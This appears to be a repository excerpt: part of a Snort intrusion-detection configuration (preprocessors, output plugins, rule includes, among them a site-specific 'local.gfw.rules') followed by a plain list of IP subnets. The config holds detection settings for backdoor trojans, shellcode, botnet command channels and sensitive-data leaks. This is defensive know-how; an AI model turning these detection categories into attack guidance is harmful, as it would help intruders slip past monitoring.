paf_max: 16000 256 | 257 | ################################################### 258 | # Step #4: Configure dynamic loaded libraries. 259 | # For more information, see Snort Manual, Configuring Snort - Dynamic Modules 260 | ################################################### 261 | 262 | # path to dynamic preprocessor libraries 263 | #! dynamicpreprocessor directory /usr/local/lib/snort_dynamicpreprocessor/ 264 | dynamicpreprocessor directory /usr/lib/snort_dynamicpreprocessor/ 265 | 266 | # path to base preprocessor engine 267 | #! dynamicengine /usr/local/lib/snort_dynamicengine/libsf_engine.so 268 | #! dynamicengine /usr/lib/snort_dynamicengine/libsf_engine.so #! disabled for performance reasons 269 | 270 | # path to dynamic rules libraries 271 | #! dynamicdetection directory /usr/local/lib/snort_dynamicrules 272 | #! dynamicdetection directory /usr/lib/snort_dynamicrules #! disabled for performance reasons 273 | 274 | ################################################### 275 | # Step #5: Configure preprocessors 276 | # For more information, see the Snort Manual, Configuring Snort - Preprocessors 277 | ################################################### 278 | 279 | # GTP Control Channle Preprocessor. For more information, see README.GTP 280 | # preprocessor gtp: ports { 2123 3386 2152 } 281 | 282 | # Inline packet normalization. For more information, see README.normalize 283 | # Does nothing in IDS mode 284 | preprocessor normalize_ip4 285 | preprocessor normalize_tcp: ips ecn stream 286 | preprocessor normalize_icmp4 287 | preprocessor normalize_ip6 288 | preprocessor normalize_icmp6 289 | 290 | # Target-based IP defragmentation. For more inforation, see README.frag3 291 | preprocessor frag3_global: max_frags 65536 292 | preprocessor frag3_engine: policy windows detect_anomalies overlap_limit 10 min_fragment_length 100 timeout 180 293 | 294 | # Target-Based stateful inspection/stream reassembly. For more inforation, see README.stream5 295 | preprocessor stream5_global: track_tcp yes, \ 296 | track_udp no, \ 297 | track_icmp no, \ 298 | max_tcp 6144, \ 299 | max_udp 131072, \ 300 | max_active_responses 2, \ 301 | min_response_seconds 5 302 | preprocessor stream5_tcp: policy windows, detect_anomalies, require_3whs 180, \ 303 | overlap_limit 10, small_segments 3 bytes 150, timeout 180, \ 304 | ports client 21 22 23 25 42 53 79 109 110 111 113 119 135 136 137 139 143 \ 305 | 161 445 513 514 587 593 691 1433 1521 2100 3306 6070 6665 6666 6667 6668 6669 \ 306 | 7000 8181 32770 32771 32772 32773 32774 32775 32776 32777 32778 32779, \ 307 | ports both 80 81 311 443 465 563 591 593 636 901 989 992 993 994 995 1220 1414 1830 2301 2381 2809 3128 3702 4343 5250 7907 7001 7145 7510 7802 7777 7779 \ 308 | 7801 7900 7901 7902 7903 7904 7905 7906 7908 7909 7910 7911 7912 7913 7914 7915 7916 \ 309 | 7917 7918 7919 7920 8000 8008 8014 8028 8080 8088 8118 8123 8180 8243 8280 8800 8888 8899 9080 9090 9091 9443 9999 11371 55555 310 | preprocessor stream5_udp: timeout 180 311 | 312 | # performance statistics. For more information, see the Snort Manual, Configuring Snort - Preprocessors - Performance Monitor 313 | # preprocessor perfmonitor: time 300 file /var/snort/snort.stats pktcnt 10000 314 | 315 | # HTTP normalization and anomaly detection. For more information, see README.http_inspect 316 | #! disabled for performance reasons: 317 | #! preprocessor http_inspect: global iis_unicode_map unicode.map 1252 compress_depth 65535 decompress_depth 65535 318 | #! preprocessor http_inspect_server: server default \ 319 | #! http_methods { GET POST PUT SEARCH MKCOL COPY MOVE LOCK UNLOCK NOTIFY POLL BCOPY BDELETE BMOVE LINK UNLINK OPTIONS HEAD DELETE TRACE TRACK CONNECT SOURCE SUBSCRIBE UNSUBSCRIBE PROPFIND PROPPATCH BPROPFIND BPROPPATCH RPC_CONNECT PROXY_SUCCESS BITS_POST CCM_POST SMS_POST RPC_IN_DATA RPC_OUT_DATA RPC_ECHO_DATA } \ 320 | #! chunk_length 500000 \ 321 | #! server_flow_depth 0 \ 322 | #! client_flow_depth 0 \ 323 | #! post_depth 65495 \ 324 | #! oversize_dir_length 500 \ 325 | #! max_header_length 750 \ 326 | #! max_headers 100 \ 327 | #! max_spaces 0 \ 328 | #! small_chunk_length { 10 5 } \ 329 | #! ports { 80 81 311 591 593 901 1220 1414 1830 2301 2381 2809 3128 3702 4343 5250 7001 7145 7510 7777 7779 8000 8008 8014 8028 8080 8088 8118 8123 8180 8181 8243 8280 8800 8888 8899 9080 9090 9091 9443 9999 11371 55555 } \ 330 | #! non_rfc_char { 0x00 0x01 0x02 0x03 0x04 0x05 0x06 0x07 } \ 331 | #! enable_cookie \ 332 | #! extended_response_inspection \ 333 | #! inspect_gzip \ 334 | #! normalize_utf \ 335 | #! unlimited_decompress \ 336 | #! normalize_javascript \ 337 | #! apache_whitespace no \ 338 | #! ascii no \ 339 | #! bare_byte no \ 340 | #! directory no \ 341 | #! double_decode no \ 342 | #! iis_backslash no \ 343 | #! iis_delimiter no \ 344 | #! iis_unicode no \ 345 | #! multi_slash no \ 346 | #! utf_8 no \ 347 | #! u_encode yes \ 348 | #! webroot no 349 | 350 | # ONC-RPC normalization and anomaly detection. For more information, see the Snort Manual, Configuring Snort - Preprocessors - RPC Decode 351 | #! disabled for performance reasons: 352 | #! preprocessor rpc_decode: 111 32770 32771 32772 32773 32774 32775 32776 32777 32778 32779 no_alert_multiple_requests no_alert_large_fragments no_alert_incomplete 353 | 354 | # Back Orifice detection. 355 | #! preprocessor bo #! disabled for performance reasons 356 | 357 | # FTP / Telnet normalization and anomaly detection. For more information, see README.ftptelnet 358 | #! disabled for performance reasons: 359 | #! preprocessor ftp_telnet: global inspection_type stateful encrypted_traffic no check_encrypted 360 | #! preprocessor ftp_telnet_protocol: telnet \ 361 | #! ayt_attack_thresh 20 \ 362 | #! normalize ports { 23 } \ 363 | #! detect_anomalies 364 | #! preprocessor ftp_telnet_protocol: ftp server default \ 365 | #! def_max_param_len 100 \ 366 | #! ports { 21 2100 3535 } \ 367 | #! telnet_cmds yes \ 368 | #! ignore_telnet_erase_cmds yes \ 369 | #! ftp_cmds { ABOR ACCT ADAT ALLO APPE AUTH CCC CDUP } \ 370 | #! ftp_cmds { CEL CLNT CMD CONF CWD DELE ENC EPRT } \ 371 | #! ftp_cmds { EPSV ESTA ESTP FEAT HELP LANG LIST LPRT } \ 372 | #! ftp_cmds { LPSV MACB MAIL MDTM MIC MKD MLSD MLST } \ 373 | #! ftp_cmds { MODE NLST NOOP OPTS PASS PASV PBSZ PORT } \ 374 | #! ftp_cmds { PROT PWD QUIT REIN REST RETR RMD RNFR } \ 375 | #! ftp_cmds { RNTO SDUP SITE SIZE SMNT STAT STOR STOU } \ 376 | #! ftp_cmds { STRU SYST TEST TYPE USER XCUP XCRC XCWD } \ 377 | #! ftp_cmds { XMAS XMD5 XMKD XPWD XRCP XRMD XRSQ XSEM } \ 378 | #! ftp_cmds { XSEN XSHA1 XSHA256 } \ 379 | #! alt_max_param_len 0 { ABOR CCC CDUP ESTA FEAT LPSV NOOP PASV PWD QUIT REIN STOU SYST XCUP XPWD } \ 380 | #! alt_max_param_len 200 { ALLO APPE CMD HELP NLST RETR RNFR STOR STOU XMKD } \ 381 | #! alt_max_param_len 256 { CWD RNTO } \ 382 | #! alt_max_param_len 400 { PORT } \ 383 | #! alt_max_param_len 512 { SIZE } \ 384 | #! chk_str_fmt { ACCT ADAT ALLO APPE AUTH CEL CLNT CMD } \ 385 | #! chk_str_fmt { CONF CWD DELE ENC EPRT EPSV ESTP HELP } \ 386 | #! chk_str_fmt { LANG LIST LPRT MACB MAIL MDTM MIC MKD } \ 387 | #! chk_str_fmt { MLSD MLST MODE NLST OPTS PASS PBSZ PORT } \ 388 | #! chk_str_fmt { PROT REST RETR RMD RNFR RNTO SDUP SITE } \ 389 | #! chk_str_fmt { SIZE SMNT STAT STOR STRU TEST TYPE USER } \ 390 | #! chk_str_fmt { XCRC XCWD XMAS XMD5 XMKD XRCP XRMD XRSQ } \ 391 | #! chk_str_fmt { XSEM XSEN XSHA1 XSHA256 } \ 392 | #! cmd_validity ALLO < int [ char R int ] > \ 393 | #! cmd_validity EPSV < [ { char 12 | char A char L char L } ] > \ 394 | #! cmd_validity MACB < string > \ 395 | #! cmd_validity MDTM < [ date nnnnnnnnnnnnnn[.n[n[n]]] ] string > \ 396 | #! cmd_validity MODE < char ASBCZ > \ 397 | #! cmd_validity PORT < host_port > \ 398 | #! cmd_validity PROT < char CSEP > \ 399 | #! cmd_validity STRU < char FRPO [ string ] > \ 400 | #! cmd_validity TYPE < { char AE [ char NTC ] | char I | char L [ number ] } > 401 | #! preprocessor ftp_telnet_protocol: ftp client default \ 402 | #! max_resp_len 256 \ 403 | #! bounce yes \ 404 | #! ignore_telnet_erase_cmds yes \ 405 | #! telnet_cmds yes 406 | 407 | 408 | # SMTP normalization and anomaly detection. For more information, see README.SMTP 409 | #! disabled for performance reasons: 410 | #! preprocessor smtp: ports { 25 465 587 691 } \ 411 | #! inspection_type stateful \ 412 | #! b64_decode_depth 0 \ 413 | #! qp_decode_depth 0 \ 414 | #! bitenc_decode_depth 0 \ 415 | #! uu_decode_depth 0 \ 416 | #! log_mailfrom \ 417 | #! log_rcptto \ 418 | #! log_filename \ 419 | #! log_email_hdrs \ 420 | #! normalize cmds \ 421 | #! normalize_cmds { ATRN AUTH BDAT CHUNKING DATA DEBUG EHLO EMAL ESAM ESND ESOM ETRN EVFY } \ 422 | #! normalize_cmds { EXPN HELO HELP IDENT MAIL NOOP ONEX QUEU QUIT RCPT RSET SAML SEND SOML } \ 423 | #! normalize_cmds { STARTTLS TICK TIME TURN TURNME VERB VRFY X-ADAT X-DRCP X-ERCP X-EXCH50 } \ 424 | #! normalize_cmds { X-EXPS X-LINK2STATE XADR XAUTH XCIR XEXCH50 XGEN XLICENSE XQUE XSTA XTRN XUSR } \ 425 | #! max_command_line_len 512 \ 426 | #! max_header_line_len 1000 \ 427 | #! max_response_line_len 512 \ 428 | #! alt_max_command_line_len 260 { MAIL } \ 429 | #! alt_max_command_line_len 300 { RCPT } \ 430 | #! alt_max_command_line_len 500 { HELP HELO ETRN EHLO } \ 431 | #! alt_max_command_line_len 255 { EXPN VRFY ATRN SIZE BDAT DEBUG EMAL ESAM ESND ESOM EVFY IDENT NOOP RSET } \ 432 | #! alt_max_command_line_len 246 { SEND SAML SOML AUTH TURN ETRN DATA RSET QUIT ONEX QUEU STARTTLS TICK TIME TURNME VERB X-EXPS X-LINK2STATE XADR XAUTH XCIR XEXCH50 XGEN XLICENSE XQUE XSTA XTRN XUSR } \ 433 | #! valid_cmds { ATRN AUTH BDAT CHUNKING DATA DEBUG EHLO EMAL ESAM ESND ESOM ETRN EVFY } \ 434 | #! valid_cmds { EXPN HELO HELP IDENT MAIL NOOP ONEX QUEU QUIT RCPT RSET SAML SEND SOML } \ 435 | #! valid_cmds { STARTTLS TICK TIME TURN TURNME VERB VRFY X-ADAT X-DRCP X-ERCP X-EXCH50 } \ 436 | #! valid_cmds { X-EXPS X-LINK2STATE XADR XAUTH XCIR XEXCH50 XGEN XLICENSE XQUE XSTA XTRN XUSR } \ 437 | #! xlink2state { enabled } 438 | 439 | # Portscan detection. For more information, see README.sfportscan 440 | # preprocessor sfportscan: proto { all } memcap { 10000000 } sense_level { low } 441 | 442 | # ARP spoof detection. For more information, see the Snort Manual - Configuring Snort - Preprocessors - ARP Spoof Preprocessor 443 | # preprocessor arpspoof 444 | # preprocessor arpspoof_detect_host: 192.168.40.1 f0:0f:00:f0:0f:00 445 | 446 | # SSH anomaly detection. For more information, see README.ssh 447 | preprocessor ssh: server_ports { 22 } \ 448 | autodetect \ 449 | max_client_bytes 19600 \ 450 | max_encrypted_packets 20 \ 451 | max_server_version_len 100 \ 452 | enable_respoverflow enable_ssh1crc32 \ 453 | enable_srvoverflow enable_protomismatch 454 | 455 | # SMB / DCE-RPC normalization and anomaly detection. For more information, see README.dcerpc2 456 | #! disabled for performance reasons: 457 | #! preprocessor dcerpc2: memcap 102400, events [co ] 458 | #! preprocessor dcerpc2_server: default, policy WinXP, \ 459 | #! detect [smb [139,445], tcp 135, udp 135, rpc-over-http-server 593], \ 460 | #! autodetect [tcp 1025:, udp 1025:, rpc-over-http-server 1025:], \ 461 | #! smb_max_chain 3, smb_invalid_shares ["C$", "D$", "ADMIN$"] 462 | 463 | # DNS anomaly detection. For more information, see README.dns 464 | #! preprocessor dns: ports { 53 } enable_rdata_overflow #! disabled for performance reasons 465 | 466 | # SSL anomaly detection and traffic bypass. For more information, see README.ssl 467 | #! disabled for performance reasons: 468 | #! preprocessor ssl: ports { 443 465 563 636 989 992 993 994 995 7801 7802 7900 7901 7902 7903 7904 7905 7906 7907 7908 7909 7910 7911 7912 7913 7914 7915 7916 7917 7918 7919 7920 }, trustservers, noinspect_encrypted 469 | 470 | # SDF sensitive data preprocessor. For more information see README.sensitive_data 471 | preprocessor sensitive_data: alert_threshold 25 472 | 473 | # SIP Session Initiation Protocol preprocessor. For more information see README.sip 474 | preprocessor sip: max_sessions 40000, \ 475 | ports { 5060 5061 5600 }, \ 476 | methods { invite \ 477 | cancel \ 478 | ack \ 479 | bye \ 480 | register \ 481 | options \ 482 | refer \ 483 | subscribe \ 484 | update \ 485 | join \ 486 | info \ 487 | message \ 488 | notify \ 489 | benotify \ 490 | do \ 491 | qauth \ 492 | sprack \ 493 | publish \ 494 | service \ 495 | unsubscribe \ 496 | prack }, \ 497 | max_uri_len 512, \ 498 | max_call_id_len 80, \ 499 | max_requestName_len 20, \ 500 | max_from_len 256, \ 501 | max_to_len 256, \ 502 | max_via_len 1024, \ 503 | max_contact_len 512, \ 504 | max_content_len 2048 505 | 506 | # IMAP preprocessor. For more information see README.imap 507 | preprocessor imap: \ 508 | ports { 143 } \ 509 | b64_decode_depth 0 \ 510 | qp_decode_depth 0 \ 511 | bitenc_decode_depth 0 \ 512 | uu_decode_depth 0 513 | 514 | # POP preprocessor. For more information see README.pop 515 | preprocessor pop: \ 516 | ports { 110 } \ 517 | b64_decode_depth 0 \ 518 | qp_decode_depth 0 \ 519 | bitenc_decode_depth 0 \ 520 | uu_decode_depth 0 521 | 522 | # Modbus preprocessor. For more information see README.modbus 523 | preprocessor modbus: ports { 502 } 524 | 525 | # DNP3 preprocessor. For more information see README.dnp3 526 | preprocessor dnp3: ports { 20000 } \ 527 | memcap 162144 \ 528 | check_crc 529 | 530 | # Reputation preprocessor. For more information see README.reputation 531 | #! disabled for performance reasons: 532 | #! preprocessor reputation: \ 533 | #! memcap 500, \ 534 | #! priority whitelist, \ 535 | #! nested_ip inner, \ 536 | #! whitelist $WHITE_LIST_PATH/white_list.rules, \ 537 | #! blacklist $BLACK_LIST_PATH/black_list.rules 538 | 539 | ################################################### 540 | # Step #6: Configure output plugins 541 | # For more information, see Snort Manual, Configuring Snort - Output Modules 542 | ################################################### 543 | 544 | # unified2 545 | # Recommended for most installs 546 | # output unified2: filename merged.log, limit 128, nostamp, mpls_event_types, vlan_event_types 547 | 548 | # Additional configuration for specific types of installs 549 | # output alert_unified2: filename snort.alert, limit 128, nostamp 550 | # output log_unified2: filename snort.log, limit 128, nostamp 551 | 552 | # syslog 553 | # output alert_syslog: LOG_AUTH LOG_ALERT 554 | 555 | # pcap 556 | # output log_tcpdump: tcpdump.log 557 | 558 | # database 559 | # output database: alert, , user= password= test dbname= host= 560 | # output database: log, , user= password= test dbname= host= 561 | 562 | # prelude 563 | # output alert_prelude 564 | 565 | ################################################### 566 | # snortsam 567 | ################################################### 568 | # In order to cause Snort to send a blocking request to the SnortSam agent, 569 | # that agent has to be listed, including the port it listens on, 570 | # and the encryption key it is using. The statement for that is: 571 | # 572 | # output alert_fwsam: {SnortSam Station}:{port}/{password} 573 | # 574 | # {SnortSam Station}: IP address or host name of the host where SnortSam is running. 575 | # {port}: The port the remote SnortSam agent listens on. 576 | # {password}: The password, or key, used for encryption of the 577 | # communication to the remote agent. 578 | # 579 | # At the very least, the IP address or host name of the host running SnortSam 580 | # needs to be specified. If the port is omitted, it defaults to TCP port 898. 581 | # If the password is omitted, it defaults to a preset password. 582 | # (In which case it needs to be omitted on the SnortSam agent as well) 583 | # 584 | # More than one host can be specified, but has to be done on the same line. 585 | # Just separate them with one or more spaces. 586 | # 587 | # Examples: 588 | # 589 | # output alert_fwsam: firewall/idspassword 590 | # output alert_fwsam: fw1.domain.tld:898/mykey 591 | # output alert_fwsam: 192.168.0.1/borderfw 192.168.1.254/wanfw 592 | 593 | # metadata reference data. do not modify these lines 594 | include classification.config 595 | include reference.config 596 | 597 | ################################################### 598 | # Step #7: Customize your rule set 599 | # For more information, see Snort Manual, Writing Snort Rules 600 | # 601 | # NOTE: All categories are enabled in this conf file 602 | ################################################### 603 | 604 | # site specific rules 605 | include $RULE_PATH/local.gfw.rules 606 | 607 | #! include $RULE_PATH/attack-responses.rules 608 | #! include $RULE_PATH/backdoor.rules 609 | #! include $RULE_PATH/bad-traffic.rules 610 | #! include $RULE_PATH/blacklist.rules 611 | #! include $RULE_PATH/botnet-cnc.rules 612 | #! include $RULE_PATH/chat.rules 613 | #! include $RULE_PATH/content-replace.rules 614 | #! include $RULE_PATH/ddos.rules 615 | #! include $RULE_PATH/dns.rules 616 | #! include $RULE_PATH/dos.rules 617 | #! include $RULE_PATH/exploit.rules 618 | #! include $RULE_PATH/file-identify.rules 619 | #! include $RULE_PATH/file-office.rules 620 | #! include $RULE_PATH/file-other.rules 621 | #! include $RULE_PATH/file-pdf.rules 622 | #! include $RULE_PATH/finger.rules 623 | #! include $RULE_PATH/ftp.rules 624 | #! include $RULE_PATH/icmp.rules 625 | #! include $RULE_PATH/icmp-info.rules 626 | #! include $RULE_PATH/imap.rules 627 | #! include $RULE_PATH/indicator-compromise.rules 628 | #! include $RULE_PATH/indicator-obfuscation.rules 629 | #! include $RULE_PATH/info.rules 630 | #! include $RULE_PATH/misc.rules 631 | #! include $RULE_PATH/multimedia.rules 632 | #! include $RULE_PATH/mysql.rules 633 | #! include $RULE_PATH/netbios.rules 634 | #! include $RULE_PATH/nntp.rules 635 | #! include $RULE_PATH/oracle.rules 636 | #! include $RULE_PATH/other-ids.rules 637 | #! include $RULE_PATH/p2p.rules 638 | #! include $RULE_PATH/phishing-spam.rules 639 | #! include $RULE_PATH/policy.rules 640 | #! include $RULE_PATH/policy-multimedia.rules 641 | #! include $RULE_PATH/policy-other.rules 642 | #! include $RULE_PATH/policy-social.rules 643 | #! include $RULE_PATH/pop2.rules 644 | #! include $RULE_PATH/pop3.rules 645 | #! include $RULE_PATH/pua-p2p.rules 646 | #! include $RULE_PATH/pua-toolbars.rules 647 | #! include $RULE_PATH/rpc.rules 648 | #! include $RULE_PATH/rservices.rules 649 | #! include $RULE_PATH/scada.rules 650 | #! include $RULE_PATH/scan.rules 651 | #! include $RULE_PATH/server-mail.rules 652 | #! include $RULE_PATH/shellcode.rules 653 | #! include $RULE_PATH/smtp.rules 654 | #! include $RULE_PATH/snmp.rules 655 | #! include $RULE_PATH/specific-threats.rules 656 | #! include $RULE_PATH/spyware-put.rules 657 | #! include $RULE_PATH/sql.rules 658 | #! include $RULE_PATH/telnet.rules 659 | #! include $RULE_PATH/tftp.rules 660 | #! include $RULE_PATH/virus.rules 661 | #! include $RULE_PATH/voip.rules 662 | #! include $RULE_PATH/web-activex.rules 663 | #! include $RULE_PATH/web-attacks.rules 664 | #! include $RULE_PATH/web-cgi.rules 665 | #! include $RULE_PATH/web-client.rules 666 | #! include $RULE_PATH/web-coldfusion.rules 667 | #! include $RULE_PATH/web-frontpage.rules 668 | #! include $RULE_PATH/web-iis.rules 669 | #! include $RULE_PATH/web-misc.rules 670 | #! include $RULE_PATH/web-php.rules 671 | #! include $RULE_PATH/x11.rules 672 | 673 | ################################################### 674 | # Step #8: Customize your preprocessor and decoder alerts 675 | # For more information, see README.decoder_preproc_rules 676 | ################################################### 677 | 678 | # decoder and preprocessor event rules 679 | # include $PREPROC_RULE_PATH/preprocessor.rules 680 | # include $PREPROC_RULE_PATH/decoder.rules 681 | # include $PREPROC_RULE_PATH/sensitive-data.rules 682 | 683 | ################################################### 684 | # Step #9: Customize your Shared Object Snort Rules 685 | # For more information, see http://vrt-sourcefire.blogspot.com/2009/01/using-vrt-certified-shared-object-rules.html 686 | ################################################### 687 | 688 | # dynamic library rules 689 | # include $SO_RULE_PATH/bad-traffic.rules 690 | # include $SO_RULE_PATH/chat.rules 691 | # include $SO_RULE_PATH/dos.rules 692 | # include $SO_RULE_PATH/exploit.rules 693 | # include $SO_RULE_PATH/icmp.rules 694 | # include $SO_RULE_PATH/imap.rules 695 | # include $SO_RULE_PATH/misc.rules 696 | # include $SO_RULE_PATH/multimedia.rules 697 | # include $SO_RULE_PATH/netbios.rules 698 | # include $SO_RULE_PATH/nntp.rules 699 | # include $SO_RULE_PATH/p2p.rules 700 | # include $SO_RULE_PATH/smtp.rules 701 | # include $SO_RULE_PATH/snmp.rules 702 | # include $SO_RULE_PATH/specific-threats.rules 703 | # include $SO_RULE_PATH/web-activex.rules 704 | # include $SO_RULE_PATH/web-client.rules 705 | # include $SO_RULE_PATH/web-iis.rules 706 | # include $SO_RULE_PATH/web-misc.rules 707 | 708 | # Event thresholding or suppression commands. See threshold.conf 709 | include threshold.conf 710 | -------------------------------------------------------------------------------- /keywords/resource/subnets.txt: -------------------------------------------------------------------------------- 1 | 199.59.149.0/24 2 | 74.3.235.0/24 3 | 60.199.217.0/24 4 | 50.97.87.0/24 5 | 74.208.161.0/24 6 | 81.88.57.0/24 7 | 198.185.159.0/24 8 | 60.199.223.0/24 9 | 69.163.225.0/24 10 | 94.198.240.0/24 11 | 85.222.234.0/24 12 | 202.181.198.0/24 13 | 192.249.116.0/24 14 | 107.20.253.0/24 15 | 23.61.248.0/24 16 | 104.28.1.0/24 17 | 66.249.64.0/19 18 | 65.254.227.0/24 19 | 74.220.221.0/24 20 | 210.143.86.0/24 21 | 91.219.194.0/24 22 | 104.28.14.0/24 23 | 173.252.64.0/18 24 | 173.230.155.0/24 25 | 119.252.78.0/24 26 | 62.210.87.0/24 27 | 210.6.241.0/24 28 | 111.92.236.0/24 29 | 103.23.20.0/24 30 | 104.131.119.0/24 31 | 50.22.218.0/24 32 | 168.1.79.0/24 33 | 116.251.204.0/24 34 | 202.43.173.0/24 35 | 85.214.45.0/24 36 | 142.4.16.0/24 37 | 206.190.140.0/24 38 | 54.255.150.0/24 39 | 198.46.83.0/24 40 | 64.14.48.0/24 41 | 199.66.238.0/24 42 | 199.233.80.0/24 43 | 210.242.234.0/24 44 | 69.28.209.0/24 45 | 218.253.0.0/24 46 | 65.32.34.0/24 47 | 66.96.147.0/24 48 | 104.16.3.0/24 49 | 209.35.159.0/24 50 | 64.93.76.0/24 51 | 54.231.160.0/24 52 | 208.64.122.0/24 53 | 173.194.64.0/24 54 | 61.63.36.0/24 55 | 208.109.4.0/24 56 | 50.63.39.0/24 57 | 96.44.185.0/24 58 | 104.28.23.0/24 59 | 89.45.197.0/24 60 | 66.254.123.0/24 61 | 61.152.104.0/24 62 | 23.235.33.0/24 63 | 204.74.216.0/24 64 | 94.102.52.0/24 65 | 66.102.0.0/20 66 | 149.174.110.0/24 67 | 173.194.117.0/24 68 | 198.74.59.0/24 69 | 190.93.243.0/24 70 | 212.7.193.0/24 71 | 198.41.205.0/24 72 | 170.20.0.0/24 73 | 210.69.146.0/24 74 | 204.0.5.0/24 75 | 173.230.146.0/24 76 | 23.235.46.0/24 77 | 38.91.110.0/24 78 | 101.78.230.0/24 79 | 223.223.218.0/24 80 | 64.13.252.0/24 81 | 167.88.156.0/24 82 | 147.8.2.0/24 83 | 184.168.135.0/24 84 | 72.47.224.0/24 85 | 46.252.156.0/24 86 | 216.17.136.0/24 87 | 199.80.55.0/24 88 | 67.195.19.0/24 89 | 195.20.13.0/24 90 | 64.71.34.0/24 91 | 72.167.51.0/24 92 | 70.32.81.0/24 93 | 162.253.133.0/24 94 | 204.13.248.0/24 95 | 162.159.240.0/24 96 | 206.212.241.0/24 97 | 50.87.146.0/24 98 | 208.113.128.0/24 99 | 54.175.52.0/24 100 | 184.72.221.0/24 101 | 210.200.216.0/24 102 | 104.20.4.0/24 103 | 54.241.184.0/24 104 | 50.28.86.0/24 105 | 54.245.239.0/24 106 | 199.193.116.0/24 107 | 210.224.174.0/24 108 | 69.191.255.0/24 109 | 62.212.83.0/24 110 | 216.45.50.0/24 111 | 183.110.253.0/24 112 | 208.88.180.0/24 113 | 103.242.31.0/24 114 | 87.106.116.0/24 115 | 188.165.91.0/24 116 | 203.124.102.0/24 117 | 69.163.147.0/24 118 | 23.91.123.0/24 119 | 81.171.123.0/24 120 | 77.92.72.0/24 121 | 117.56.132.0/24 122 | 195.20.45.0/24 123 | 210.157.1.0/24 124 | 192.185.136.0/24 125 | 94.76.253.0/24 126 | 65.254.248.0/24 127 | 68.68.107.0/24 128 | 199.83.134.0/24 129 | 64.4.6.0/24 130 | 174.129.25.0/24 131 | 180.233.142.0/24 132 | 223.27.37.0/24 133 | 85.13.139.0/24 134 | 75.98.17.0/24 135 | 209.17.70.0/24 136 | 42.159.203.0/24 137 | 8.8.8.0/24 138 | 98.137.236.0/24 139 | 195.110.124.0/24 140 | 96.126.96.0/24 141 | 140.211.166.0/24 142 | 163.28.83.0/24 143 | 5.153.9.0/24 144 | 202.190.173.0/24 145 | 69.163.144.0/24 146 | 69.16.128.0/24 147 | 210.0.141.0/24 148 | 88.159.13.0/27 149 | 210.243.166.0/24 150 | 104.131.159.0/24 151 | 72.52.149.0/24 152 | 94.23.225.0/24 153 | 69.10.32.0/24 154 | 106.187.95.0/24 155 | 120.29.145.0/24 156 | 91.193.20.0/24 157 | 188.40.62.0/24 158 | 23.5.157.0/24 159 | 68.71.38.0/24 160 | 199.182.122.0/24 161 | 148.251.80.0/24 162 | 50.23.146.0/24 163 | 59.188.16.0/24 164 | 8.5.1.0/24 165 | 23.21.235.0/24 166 | 98.138.19.0/24 167 | 147.203.108.0/24 168 | 198.11.248.0/24 169 | 38.99.106.0/24 170 | 82.208.18.0/24 171 | 192.185.6.0/24 172 | 176.9.137.0/24 173 | 210.5.43.0/24 174 | 182.48.37.0/24 175 | 69.167.138.0/24 176 | 50.63.149.0/24 177 | 69.171.224.0/19 178 | 69.163.201.0/24 179 | 27.121.46.0/24 180 | 210.61.0.0/16 181 | 207.192.128.0/24 182 | 69.63.176.0/20 183 | 216.239.32.0/24 184 | 176.32.102.0/24 185 | 106.187.45.0/24 186 | 210.17.235.0/24 187 | 107.20.178.0/24 188 | 66.147.242.0/24 189 | 69.13.98.0/24 190 | 124.108.120.0/24 191 | 170.149.172.0/24 192 | 159.33.94.0/24 193 | 202.172.28.0/24 194 | 205.178.189.0/24 195 | 5.153.70.0/24 196 | 174.37.129.0/24 197 | 95.211.200.0/24 198 | 74.50.55.0/24 199 | 211.72.252.0/24 200 | 49.212.159.0/24 201 | 121.78.0.0/16 202 | 23.252.122.0/24 203 | 69.167.133.0/24 204 | 54.72.9.0/24 205 | 96.126.100.0/24 206 | 206.221.217.0/24 207 | 146.185.183.0/24 208 | 64.22.117.0/24 209 | 146.123.140.0/24 210 | 213.52.252.0/24 211 | 216.139.249.0/24 212 | 176.126.237.0/24 213 | 176.32.92.0/24 214 | 174.143.145.0/24 215 | 67.228.224.0/24 216 | 163.28.116.0/24 217 | 184.73.237.0/24 218 | 23.21.124.0/24 219 | 54.254.206.0/24 220 | 104.28.30.0/24 221 | 213.174.158.0/24 222 | 124.150.132.0/24 223 | 65.254.250.0/24 224 | 192.33.31.0/24 225 | 54.245.228.0/24 226 | 208.53.147.0/24 227 | 69.161.144.0/24 228 | 199.83.135.0/24 229 | 79.125.7.0/24 230 | 103.232.215.0/24 231 | 173.194.66.0/24 232 | 50.62.99.0/24 233 | 178.45.250.0/23 234 | 77.247.178.0/24 235 | 209.85.171.0/24 236 | 80.94.76.0/24 237 | 54.67.120.0/24 238 | 91.121.160.0/24 239 | 114.32.70.0/24 240 | 69.191.212.0/24 241 | 89.31.143.0/24 242 | 208.69.40.0/24 243 | 174.36.0.0/15 244 | 69.171.229.0/24 245 | 91.218.114.0/24 246 | 199.85.212.0/24 247 | 210.155.157.0/24 248 | 202.67.195.0/24 249 | 216.178.46.0/24 250 | 180.70.93.0/24 251 | 63.226.5.0/24 252 | 50.16.229.0/24 253 | 103.11.101.0/24 254 | 198.57.156.0/24 255 | 78.109.93.0/24 256 | 54.83.18.0/24 257 | 174.127.109.0/24 258 | 61.64.127.0/24 259 | 173.194.37.0/24 260 | 68.178.240.0/24 261 | 69.163.131.0/24 262 | 208.94.116.0/24 263 | 198.41.187.0/24 264 | 216.239.36.0/24 265 | 107.170.239.0/24 266 | 94.185.85.0/24 267 | 184.105.182.0/24 268 | 108.163.162.0/24 269 | 173.193.137.0/24 270 | 208.75.185.0/24 271 | 154.35.132.0/24 272 | 66.228.44.0/24 273 | 74.112.185.0/24 274 | 141.8.224.0/24 275 | 193.90.147.0/26 276 | 109.202.99.0/24 277 | 61.58.41.0/24 278 | 23.254.217.0/24 279 | 221.246.113.0/24 280 | 58.1.224.0/24 281 | 54.215.176.0/24 282 | 104.28.0.0/24 283 | 76.73.45.0/24 284 | 223.27.36.0/24 285 | 118.244.165.0/24 286 | 160.153.41.0/24 287 | 87.255.36.0/24 288 | 107.21.232.0/24 289 | 80.179.147.0/24 290 | 116.251.205.0/24 291 | 38.229.72.0/24 292 | 108.61.145.0/24 293 | 98.137.88.0/24 294 | 98.129.229.0/24 295 | 69.163.145.0/24 296 | 59.188.3.0/24 297 | 216.92.168.0/24 298 | 216.24.199.0/24 299 | 60.198.0.0/15 300 | 149.174.107.0/24 301 | 88.221.87.0/24 302 | 174.139.0.0/24 303 | 37.187.27.0/24 304 | 163.192.187.0/24 305 | 67.207.139.0/24 306 | 74.52.63.0/24 307 | 184.172.38.0/24 308 | 173.199.187.0/24 309 | 182.50.148.0/24 310 | 113.196.250.0/24 311 | 212.150.211.0/24 312 | 